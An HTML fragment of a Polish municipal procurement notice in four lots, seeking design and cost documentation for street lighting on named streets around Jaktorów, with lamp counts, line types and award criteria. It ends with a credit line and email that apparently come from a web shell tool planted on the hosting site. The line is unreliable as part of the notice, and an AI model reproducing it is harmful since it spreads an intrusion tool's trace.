<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie dokumentacji projektowo - kosztorysowej na budowę oświetlenia ulicznego w ul. Alpejskiej od ul Włoskiej obręb Chylice, Budy - Grzybek, ul. Wyczółkowskiego obręb Budy Grzybek, Blich; ul. Wołodyjowskiego, ul. Skrzetuskiego, ul. Kmicica, ul. Zagłoby, ul. Powstańców (Fabryczna), ul. Ketlinga obręb Jaktorów, ul. Matejki  obręb Budy - Grzybek, ul. Rowickiego obręb Budy Grzybek, ul. Kiepury obręb Budy Grzybek, ul. Potockiego obręb Budy Grzybek..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac projektowych obejmuje: 
1)	Opracowanie koncepcji projektowej oświetlenia zawierającej informację o podstawowych parametrach technicznych rozwiązań funkcjonalnych i materiałach proponowanych do zastosowania oraz szacunkowych kosztach w terminie 30 dni od dnia podpisania umowy.
2)	Zamawiający w terminie 7 dni od dnia przekazania koncepcji przez  Wykonawcę dokona oceny koncepcji i na piśmie przedłoży uwagi.
3)	Opracowanie ostatecznej wersji koncepcji w terminie 10 dni i uzyskanie pisemnej akceptacji Zamawiającego.
4)	Ilość koncepcji - 2 egz. w wersji papierowej .
5)	Przygotowanie i dostarczenie niezbędnych materiałów do uzyskania decyzji o ustaleniu lokalizacji inwestycji celu publicznego zgodnie z ustawą 27 marca 2003 r. o Planowaniu i zagospodarowaniu przestrzennym ( Dz. U. 2012 r. poz. 647 ze zm. ) lub uzyskanie wypisów z  miejscowego planu zagospodarowania.
6)	Uzyskanie map sytuacyjno-wysokościowych do celów projektowych w skali 1:500 w niezbędnym zakresie.
7)	Uzyskanie wypisów z ewidencji gruntów.
8)	Uzyskanie w imieniu Zamawiającego użyczenia gruntu na budowę oświetlenia od właścicieli nieruchomości wynikających z wypisu ewidencji gruntów.
9)	Uzyskanie decyzji pozwolenia wodno - prawnego ( w przypadku konieczności).
10)	Opracowanie materiałów do złożenia wniosku o uzyskanie decyzji zezwalającej na wycinkę drzew (w przypadku konieczności).
11)	Projekt wycinki drzew (w przypadku konieczności).
12)	 Projekty budowlane przebudowy infrastruktury technicznej kolidującej z projektowanymi liniami oświetlenia ulicznego  ( jeżeli zachodzi taka konieczność ).
13)	Dokumentacja, o której mowa musi zawierać następujące opracowania ( odrębnie dla każdej ulicy z danej części):
a)	projekty budowlane wykonane na mapie do celów projektowych w skali 1:500 z naniesionymi granicami pasa drogowego wraz ze szczegółowymi opiniami, uzgodnieniami z właściwymi organami oraz zatwierdzeniami niezbędnymi do kompleksowej realizacji zadania w 4 egzemplarzach,
b)	projekty wykonawcze wykonane na mapie do celów projektowych w skali 1:500 z naniesionymi granicami pasa drogowego wraz ze szczegółowymi opiniami, uzgodnieniami z właściwymi organami oraz zatwierdzeniami niezbędnymi do kompleksowej realizacji zadania w  3 egzemplarzach,
c)	kosztorys inwestorski  w 1 egzemplarzu,
d)	kosztorys ofertowy w 1 egzemplarzu,
e)	przedmiar robót  w 1 egzemplarzu,
f)	specyfikacja techniczna wykonania i odbioru robót  w 3 egzemplarzach,
g)	informację dotyczącą bezpieczeństwa i ochrony zdrowia należy wykonać zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 23.06.2003r. (Dz. U. Nr 120 poz. 1126) w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia w 7 egzemplarzach.
h)	nadzór autorski.
14)	Dokumentacja musi być sporządzona w formie papierowej - w ilościach określonych dla poszczególnych opracowań w ust. 13 oraz w formie elektronicznej w 1 egzemplarzu na nośniku elektronicznym CD -R, w tym dokumentację projektową, przedmiary robót, STWiOR, kosztorysy inwestorskie - w formacie PDF ( odrębnie dla każdej ulicy z danej części).
15)	Uzyskanie wszystkich wymaganych prawem decyzji, opinii, uzgodnień i sprawdzeń dla potrzeb realizacji Przedmiotu Umowy, w tym w szczególności niezbędnych do uzyskania Decyzji pozwolenia na budowę  ( odrębnie dla każdej ulicy z danej części) oraz inne niezbędne decyzje opinie i uzgodnienia, w ramach wynagrodzenia za wykonanie Przedmiotu Umowy. Wykonawca  zobowiązany jest do przygotowania wniosku o wydanie Decyzji pozwolenia na budowę( odrębnie dla każdej ulicy z danej części) . Złożenie wniosku i uzyskanie Decyzji pozwolenia na budowę jest po stronie Zamawiającego. 
16)	Wykonawca zobowiązany jest do opisywania proponowanych materiałów, wyrobów i urządzeń za pomocą parametrów technicznych, tzn. bez podawania ich nazw. Jeżeli nie będzie to możliwe na zasadach określonych w art. 29 ust. 3 ustawy Pzp i jedyną możliwością będzie podanie nazwy materiału , to projektant zobowiązany jest do podania co najmniej dwóch producentów tych materiałów a także określenie w dokumentacji projektowej cech jakościowych tych materiałów.

L.p.	Nazwa ulicy	Przewidywana długość	Przewidywana ilość lamp o mocy 70 - 100 W	Rodzaj słupów	Rodzaj linii	Numer warunków technicznych
Część I						
1	ul. Alpejska od ul Włoskiej, dz. ew. 155/32, 166/2, 226/2 obręb Chylice, Budy - Grzybek	ok. 0,6 km +  0,8 km = 1,4 km	ok. 38 szt.	Na istniejących słupach + słupy wirowane	Linia kablowa napowietrzna	02-RP-001770-2015 716/2015/P                                              15/R1/08507
2	ul. Wyczółkowskiego dz. ew. 506, 460, 464/2, 262/3 obręb Budy Grzybek	ok. 0,9 km	ok. 20 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001741-2015 718/2015/P
3	Blich; ul. Wołodyjowskiego dz. ew. 265/37, ul. Skrzetuskiego dz. ew. 265/58, ul. Kmicica dz. ew. 265/20, ul. Zagłoby dz. ew. 265/11, ul. Powstańców (Fabryczna) dz. ew. 265/21, 265/15ul. Ketlinga dz. ew. 265/26 obręb Jaktorów	ok. 1,7 km	ok. 36 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001754-2015 717/2015/Pul. Matejki dz. ew. 450/2, 451/1, 450/20 obręb Budy - Grzybek	ok. 0,45 km	ok 10 szt.	Słupy wirowane	Linia kablowa doziemna	02-RP-001753-2015 729/2015/P
ul. Rowickiego obręb Budy Grzybek	ok. 0,7 km	ok. 16 szt.	Słupy wirowane	Linia kablowa doziemna	02-RP-001753-2015 729/2015/P
ul. Kiepury dz. ew. 140/1, 140/2, 122/3 obręb Budy Grzybek	ok. 0,45 km	ok 11 szt.	Słupy wirowane	Linia kablowa doziemna	02-RP-001761-2015 730/2015/P
ul. Potockiego obręb Budy Grzybek	ok. 1,03 km	ok. 23 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001748-2015 728/2015/P.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.31.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin udzielonej rękojmi na wykonaną usługę określony w miesiącach - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie dokumentacji projektowo - kosztorysowej na budowę oświetlenia ulicznego w ul. Wysockiego, Kościuszki obręb Kolonia Jaktorów, ul. Parkowa obręb Chylice Kolonia, ul. Ułanów obręb Jaktorów, ul. Błotna i Łąkowa obręb Jaktorów, ul. Chopina obręb Budy Grzybek, ul. Sygietyńskiego obręb Budy Michałowskie, ul. Radziejowicka obręb Budy Stare/Michałowskie, ul. Paderewskiego obręb Budy Grzybek..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac projektowych obejmuje: 
1)	Opracowanie koncepcji projektowej oświetlenia zawierającej informację o podstawowych parametrach technicznych rozwiązań funkcjonalnych i materiałach proponowanych do zastosowania oraz szacunkowych kosztach w terminie 30 dni od dnia podpisania umowy.
2)	Zamawiający w terminie 7 dni od dnia przekazania koncepcji przez  Wykonawcę dokona oceny koncepcji i na piśmie przedłoży uwagi.
3)	Opracowanie ostatecznej wersji koncepcji w terminie 10 dni i uzyskanie pisemnej akceptacji Zamawiającego.
4)	Ilość koncepcji - 2 egz. w wersji papierowej .
5)	Przygotowanie i dostarczenie niezbędnych materiałów do uzyskania decyzji o ustaleniu lokalizacji inwestycji celu publicznego zgodnie z ustawą 27 marca 2003 r. o Planowaniu i zagospodarowaniu przestrzennym ( Dz. U. 2012 r. poz. 647 ze zm. ) lub uzyskanie wypisów z  miejscowego planu zagospodarowania.
6)	Uzyskanie map sytuacyjno-wysokościowych do celów projektowych w skali 1:500 w niezbędnym zakresie.
7)	Uzyskanie wypisów z ewidencji gruntów.
8)	Uzyskanie w imieniu Zamawiającego użyczenia gruntu na budowę oświetlenia od właścicieli nieruchomości wynikających z wypisu ewidencji gruntów.
9)	Uzyskanie decyzji pozwolenia wodno - prawnego ( w przypadku konieczności).
10)	Opracowanie materiałów do złożenia wniosku o uzyskanie decyzji zezwalającej na wycinkę drzew (w przypadku konieczności).
11)	Projekt wycinki drzew (w przypadku konieczności).
12)	 Projekty budowlane przebudowy infrastruktury technicznej kolidującej z projektowanymi liniami oświetlenia ulicznego  ( jeżeli zachodzi taka konieczność ).
13)	Dokumentacja, o której mowa musi zawierać następujące opracowania ( odrębnie dla każdej ulicy z danej części):
a)	projekty budowlane wykonane na mapie do celów projektowych w skali 1:500 z naniesionymi granicami pasa drogowego wraz ze szczegółowymi opiniami, uzgodnieniami z właściwymi organami oraz zatwierdzeniami niezbędnymi do kompleksowej realizacji zadania w 4 egzemplarzach,
b)	projekty wykonawcze wykonane na mapie do celów projektowych w skali 1:500 z naniesionymi granicami pasa drogowego wraz ze szczegółowymi opiniami, uzgodnieniami z właściwymi organami oraz zatwierdzeniami niezbędnymi do kompleksowej realizacji zadania w  3 egzemplarzach,
c)	kosztorys inwestorski  w 1 egzemplarzu,
d)	kosztorys ofertowy w 1 egzemplarzu,
e)	przedmiar robót  w 1 egzemplarzu,
f)	specyfikacja techniczna wykonania i odbioru robót  w 3 egzemplarzach,
g)	informację dotyczącą bezpieczeństwa i ochrony zdrowia należy wykonać zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 23.06.2003r. (Dz. U. Nr 120 poz. 1126) w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia w 7 egzemplarzach.
h)	nadzór autorski.
14)	Dokumentacja musi być sporządzona w formie papierowej - w ilościach określonych dla poszczególnych opracowań w ust. 13 oraz w formie elektronicznej w 1 egzemplarzu na nośniku elektronicznym CD -R, w tym dokumentację projektową, przedmiary robót, STWiOR, kosztorysy inwestorskie - w formacie PDF ( odrębnie dla każdej ulicy z danej części).
15)	Uzyskanie wszystkich wymaganych prawem decyzji, opinii, uzgodnień i sprawdzeń dla potrzeb realizacji Przedmiotu Umowy, w tym w szczególności niezbędnych do uzyskania Decyzji pozwolenia na budowę  ( odrębnie dla każdej ulicy z danej części) oraz inne niezbędne decyzje opinie i uzgodnienia, w ramach wynagrodzenia za wykonanie Przedmiotu Umowy. Wykonawca  zobowiązany jest do przygotowania wniosku o wydanie Decyzji pozwolenia na budowę( odrębnie dla każdej ulicy z danej części) . Złożenie wniosku i uzyskanie Decyzji pozwolenia na budowę jest po stronie Zamawiającego. 
16)	Wykonawca zobowiązany jest do opisywania proponowanych materiałów, wyrobów i urządzeń za pomocą parametrów technicznych, tzn. bez podawania ich nazw. Jeżeli nie będzie to możliwe na zasadach określonych w art. 29 ust. 3 ustawy Pzp i jedyną możliwością będzie podanie nazwy materiału , to projektant zobowiązany jest do podania co najmniej dwóch producentów tych materiałów a także określenie w dokumentacji projektowej cech jakościowych tych materiałów.

Nazwa ulicy	Przewidywana długość	Przewidywana ilość lamp o mocy 70 - 100 W	Rodzaj słupów	Rodzaj linii	Numer warunków technicznych
Część II						
1	ul. Wysockiego, Kościuszki obręb Kolonia Jaktorów	ul Wysockiego - ok. 0,72 km, ul. Kościuszki - 0,32 km	ul. Wysickiego - ok. 17 szt. Ul. Kościuszki - ok. 7 szt.	Słupy wirowane oraz na istniejących słupach	Linia kablowa napowietrzna	02-RP-001759-2015 711/2015/P
2	ul. Parkowa obręb Chylice Kolonia	ok. 0,4 km	ok. 10 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001781-2015 734/2015/P
3	ul. Ułanów obręb Jaktorów	ok. 1,02 km	ok. 23 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001739-2015 726/2015/P
4	ul. Błotna i Łąkowa obręb Jaktorów	ok. 0,6 km	ok. 14 szt.	Na istniejących słupach	Linia kablowa napowietrzna	02-RP-001739-2015 726/2015/P
5	ul. Chopina obręb Budy Grzybek	ok. 1,1 km	ok. 24 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001749-2015 712/2015/P
6	ul. Sygietyńskiego obręb Budy Michałowskie	ok. 0,54 km	ok. 13 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001750-2015 714/2015/P
7	ul. Radziejowicka obręb Budy Stare/Michałowskie	ok. 1,25 km	ok. 29 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001769-2015 715/2015/P
8	ul. Paderewskiego obręb Budy Grzybek	ok. 0,25 km	ok. 6 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001752-2015 713/2015/P.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.31.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin udzielonej rękojmi na wykonaną usługę określony w miesiącach - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie dokumentacji projektowo - kosztorysowej na budowę oświetlenia ulicznego w ul. Kaska obręb Stare Budy, ul. Armii Krajowej obręb  Budy Zosine, ul. Topolowa obręb Henryszew..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac projektowych obejmuje: 
1)	Opracowanie koncepcji projektowej oświetlenia zawierającej informację o podstawowych parametrach technicznych rozwiązań funkcjonalnych i materiałach proponowanych do zastosowania oraz szacunkowych kosztach w terminie 30 dni od dnia podpisania umowy.
2)	Zamawiający w terminie 7 dni od dnia przekazania koncepcji przez  Wykonawcę dokona oceny koncepcji i na piśmie przedłoży uwagi.
3)	Opracowanie ostatecznej wersji koncepcji w terminie 10 dni i uzyskanie pisemnej akceptacji Zamawiającego.
4)	Ilość koncepcji - 2 egz. w wersji papierowej .
5)	Przygotowanie i dostarczenie niezbędnych materiałów do uzyskania decyzji o ustaleniu lokalizacji inwestycji celu publicznego zgodnie z ustawą 27 marca 2003 r. o Planowaniu i zagospodarowaniu przestrzennym ( Dz. U. 2012 r. poz. 647 ze zm. ) lub uzyskanie wypisów z  miejscowego planu zagospodarowania.
6)	Uzyskanie map sytuacyjno-wysokościowych do celów projektowych w skali 1:500 w niezbędnym zakresie.
7)	Uzyskanie wypisów z ewidencji gruntów.
8)	Uzyskanie w imieniu Zamawiającego użyczenia gruntu na budowę oświetlenia od właścicieli nieruchomości wynikających z wypisu ewidencji gruntów.
9)	Uzyskanie decyzji pozwolenia wodno - prawnego ( w przypadku konieczności).
10)	Opracowanie materiałów do złożenia wniosku o uzyskanie decyzji zezwalającej na wycinkę drzew (w przypadku konieczności).
11)	Projekt wycinki drzew (w przypadku konieczności).
12)	 Projekty budowlane przebudowy infrastruktury technicznej kolidującej z projektowanymi liniami oświetlenia ulicznego  ( jeżeli zachodzi taka konieczność ).
13)	Dokumentacja, o której mowa musi zawierać następujące opracowania ( odrębnie dla każdej ulicy z danej części):
a)	projekty budowlane wykonane na mapie do celów projektowych w skali 1:500 z naniesionymi granicami pasa drogowego wraz ze szczegółowymi opiniami, uzgodnieniami z właściwymi organami oraz zatwierdzeniami niezbędnymi do kompleksowej realizacji zadania w 4 egzemplarzach,
b)	projekty wykonawcze wykonane na mapie do celów projektowych w skali 1:500 z naniesionymi granicami pasa drogowego wraz ze szczegółowymi opiniami, uzgodnieniami z właściwymi organami oraz zatwierdzeniami niezbędnymi do kompleksowej realizacji zadania w  3 egzemplarzach,
c)	kosztorys inwestorski  w 1 egzemplarzu,
d)	kosztorys ofertowy w 1 egzemplarzu,
e)	przedmiar robót  w 1 egzemplarzu,
f)	specyfikacja techniczna wykonania i odbioru robót  w 3 egzemplarzach,
g)	informację dotyczącą bezpieczeństwa i ochrony zdrowia należy wykonać zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 23.06.2003r. (Dz. U. Nr 120 poz. 1126) w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia w 7 egzemplarzach.
h)	nadzór autorski.
14)	Dokumentacja musi być sporządzona w formie papierowej - w ilościach określonych dla poszczególnych opracowań w ust. 13 oraz w formie elektronicznej w 1 egzemplarzu na nośniku elektronicznym CD -R, w tym dokumentację projektową, przedmiary robót, STWiOR, kosztorysy inwestorskie - w formacie PDF ( odrębnie dla każdej ulicy z danej części).
15)	Uzyskanie wszystkich wymaganych prawem decyzji, opinii, uzgodnień i sprawdzeń dla potrzeb realizacji Przedmiotu Umowy, w tym w szczególności niezbędnych do uzyskania Decyzji pozwolenia na budowę  ( odrębnie dla każdej ulicy z danej części) oraz inne niezbędne decyzje opinie i uzgodnienia, w ramach wynagrodzenia za wykonanie Przedmiotu Umowy. Wykonawca  zobowiązany jest do przygotowania wniosku o wydanie Decyzji pozwolenia na budowę( odrębnie dla każdej ulicy z danej części) . Złożenie wniosku i uzyskanie Decyzji pozwolenia na budowę jest po stronie Zamawiającego. 
16)	Wykonawca zobowiązany jest do opisywania proponowanych materiałów, wyrobów i urządzeń za pomocą parametrów technicznych, tzn. bez podawania ich nazw. Jeżeli nie będzie to możliwe na zasadach określonych w art. 29 ust. 3 ustawy Pzp i jedyną możliwością będzie podanie nazwy materiału , to projektant zobowiązany jest do podania co najmniej dwóch producentów tych materiałów a także określenie w dokumentacji projektowej cech jakościowych tych materiałów.

Nazwa ulicy	Przewidywana długość	Przewidywana ilość lamp o mocy 70 - 100 W	Rodzaj słupów	Rodzaj linii	Numer warunków technicznych
Część III						
1	ul. Kaska obręb Stare Budy	ok. 2,0 km	ok. 45 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001778-2015 736/2015/P                            02-RP-001774-2015 733/2015/P
2	ul. Armii Krajowej obręb  Budy Zosine	ok. 2,8 km	 ok. 62 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001782-2015 737/2015/P                                  02-RP-001785-2015 738/2015/P
3	ul. Topolowa obręb Henryszew	 ok. 2,2 km	 ok. 54 szt. 	Słupy stalowe ocynkowane	Linia kablowa doziemna	02-RP-001743-2015 727/2015/P.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.31.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2015.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Opracowanie dokumentacji projektowo - kosztorysowej na budowę oświetlenia ulicznego w ul. Królowej Marysieńki obręb Sade Budy, ul. Heweliusza + CMK obręb Bieganów, ul. Topolowa obręb Bieganów oraz w m. Mariampol..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac projektowych obejmuje: 
1)	Opracowanie koncepcji projektowej oświetlenia zawierającej informację o podstawowych parametrach technicznych rozwiązań funkcjonalnych i materiałach proponowanych do zastosowania oraz szacunkowych kosztach w terminie 30 dni od dnia podpisania umowy.
2)	Zamawiający w terminie 7 dni od dnia przekazania koncepcji przez  Wykonawcę dokona oceny koncepcji i na piśmie przedłoży uwagi.
3)	Opracowanie ostatecznej wersji koncepcji w terminie 10 dni i uzyskanie pisemnej akceptacji Zamawiającego.
4)	Ilość koncepcji - 2 egz. w wersji papierowej .
5)	Przygotowanie i dostarczenie niezbędnych materiałów do uzyskania decyzji o ustaleniu lokalizacji inwestycji celu publicznego zgodnie z ustawą 27 marca 2003 r. o Planowaniu i zagospodarowaniu przestrzennym ( Dz. U. 2012 r. poz. 647 ze zm. ) lub uzyskanie wypisów z  miejscowego planu zagospodarowania.
6)	Uzyskanie map sytuacyjno-wysokościowych do celów projektowych w skali 1:500 w niezbędnym zakresie.
7)	Uzyskanie wypisów z ewidencji gruntów.
8)	Uzyskanie w imieniu Zamawiającego użyczenia gruntu na budowę oświetlenia od właścicieli nieruchomości wynikających z wypisu ewidencji gruntów.
9)	Uzyskanie decyzji pozwolenia wodno - prawnego ( w przypadku konieczności).
10)	Opracowanie materiałów do złożenia wniosku o uzyskanie decyzji zezwalającej na wycinkę drzew (w przypadku konieczności).
11)	Projekt wycinki drzew (w przypadku konieczności).
12)	 Projekty budowlane przebudowy infrastruktury technicznej kolidującej z projektowanymi liniami oświetlenia ulicznego  ( jeżeli zachodzi taka konieczność ).
13)	Dokumentacja, o której mowa musi zawierać następujące opracowania ( odrębnie dla każdej ulicy z danej części):
a)	projekty budowlane wykonane na mapie do celów projektowych w skali 1:500 z naniesionymi granicami pasa drogowego wraz ze szczegółowymi opiniami, uzgodnieniami z właściwymi organami oraz zatwierdzeniami niezbędnymi do kompleksowej realizacji zadania w 4 egzemplarzach,
b)	projekty wykonawcze wykonane na mapie do celów projektowych w skali 1:500 z naniesionymi granicami pasa drogowego wraz ze szczegółowymi opiniami, uzgodnieniami z właściwymi organami oraz zatwierdzeniami niezbędnymi do kompleksowej realizacji zadania w  3 egzemplarzach,
c)	kosztorys inwestorski  w 1 egzemplarzu,
d)	kosztorys ofertowy w 1 egzemplarzu,
e)	przedmiar robót  w 1 egzemplarzu,
f)	specyfikacja techniczna wykonania i odbioru robót  w 3 egzemplarzach,
g)	informację dotyczącą bezpieczeństwa i ochrony zdrowia należy wykonać zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 23.06.2003r. (Dz. U. Nr 120 poz. 1126) w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia w 7 egzemplarzach.
h)	nadzór autorski.
14)	Dokumentacja musi być sporządzona w formie papierowej - w ilościach określonych dla poszczególnych opracowań w ust. 13 oraz w formie elektronicznej w 1 egzemplarzu na nośniku elektronicznym CD -R, w tym dokumentację projektową, przedmiary robót, STWiOR, kosztorysy inwestorskie - w formacie PDF ( odrębnie dla każdej ulicy z danej części).
15)	Uzyskanie wszystkich wymaganych prawem decyzji, opinii, uzgodnień i sprawdzeń dla potrzeb realizacji Przedmiotu Umowy, w tym w szczególności niezbędnych do uzyskania Decyzji pozwolenia na budowę  ( odrębnie dla każdej ulicy z danej części) oraz inne niezbędne decyzje opinie i uzgodnienia, w ramach wynagrodzenia za wykonanie Przedmiotu Umowy. Wykonawca  zobowiązany jest do przygotowania wniosku o wydanie Decyzji pozwolenia na budowę( odrębnie dla każdej ulicy z danej części) . Złożenie wniosku i uzyskanie Decyzji pozwolenia na budowę jest po stronie Zamawiającego. 
16)	Wykonawca zobowiązany jest do opisywania proponowanych materiałów, wyrobów i urządzeń za pomocą parametrów technicznych, tzn. bez podawania ich nazw. Jeżeli nie będzie to możliwe na zasadach określonych w art. 29 ust. 3 ustawy Pzp i jedyną możliwością będzie podanie nazwy materiału , to projektant zobowiązany jest do podania co najmniej dwóch producentów tych materiałów a także określenie w dokumentacji projektowej cech jakościowych tych materiałów.

Przewidywana długość	Przewidywana ilość lamp o mocy 70 - 100 W	Rodzaj słupów	Rodzaj linii	Numer warunków technicznych
Część IV						
1	ul. Królowej Marysieńki obręb Sade Budy	ok. 1,95 km	ok. 48 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001758-2015 722/2015/P                                02-RP-001764-2015 721/2015/P
2	ul. Heweliusza + CMK obręb Bieganów	ok. 2,2 km	ok. 55 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001787-2015 739/2015/P                                 02-RP-001745-2015 719/2015/P              02-RP-001747-2015 720/2015?P
3	ul. Topolowa obręb Bieganów	ok. 0,7 km	ok. 17 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001767-2015 731/2015/P
4	Mariampol dz. ew. 95/2, 144	ok. 0,65 km	ok. 15 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001771-2015 732/2015/P.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.31.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2015.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com